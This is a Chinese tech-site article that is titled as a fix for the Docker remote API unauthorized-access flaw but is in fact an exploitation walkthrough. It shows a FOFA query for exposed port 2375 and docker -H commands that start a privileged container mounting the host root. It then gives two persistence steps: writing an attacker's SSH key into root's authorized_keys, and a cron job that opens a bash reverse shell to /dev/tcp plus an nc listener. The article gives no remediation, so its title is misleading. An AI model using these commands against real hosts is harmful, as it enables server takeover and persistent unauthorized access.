温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Docker API未授权访问漏洞问题怎么解决

发布时间:2023-03-31 15:03:17 来源:亿速云 阅读:334 作者:iii 栏目:开发技术

本篇内容主要讲解“Docker API未授权访问漏洞问题怎么解决”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Docker API未授权访问漏洞问题怎么解决”吧!

因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。

docker api未授权访问漏洞

00x1 漏洞成因

因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。

00x2 信息收集

FOFA中搜索port = 2375 && status_code = "404"

访问站点2375端口,显示

Docker API未授权访问漏洞问题怎么解决

访问/info目录,查看版本信息

Docker API未授权访问漏洞问题怎么解决

证明改站点存在docker未授权访问漏洞

00x3 漏洞利用

docker -H tcp://ip ps -a 查看容器
dokcer -H tcp:// images 查看镜像

为了获取宿主机的权限,我们需要把宿主机的根目录挂载到docker容器中

docker -H tcp://ip run -it  --privileged=true -v /:/mnt --entrypoint /bin/bash image-id

--privileged=true:使用该参数,container内的root拥有真正的root权限。

-v /:/mnt:将宿主机的根目录挂载到/mnt目录下

--entrypoint /bin/bash:指定镜像的默认入口命令,该入口命令会在启动容器时作为根命令执行,所有其他传入值作为该命令的参数,用法ENTRYPOINT command param1 param2

Docker API未授权访问漏洞问题怎么解决

现在就拿到了root权限,利用方式有很多种

ssh连接
 ssh-keygen -t rsa        //生成一个ssh公钥
 cat /root/.ssh/id_rsa.pub       //查看生成的公钥
 echo "公钥内容" > /mnt/root/.ssh/authorized_keys   //写公钥
 ssh root@目标ip -i id_rsa    //ssh进行连接
写计划任务
nc -lvvp port 		//开启监听
echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" >  /mnt/var/spool/cron/root   	///反弹shell

到此,相信大家对“Docker API未授权访问漏洞问题怎么解决”有了更深的了解,不妨来实际操作一番吧!这里是亿速云网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI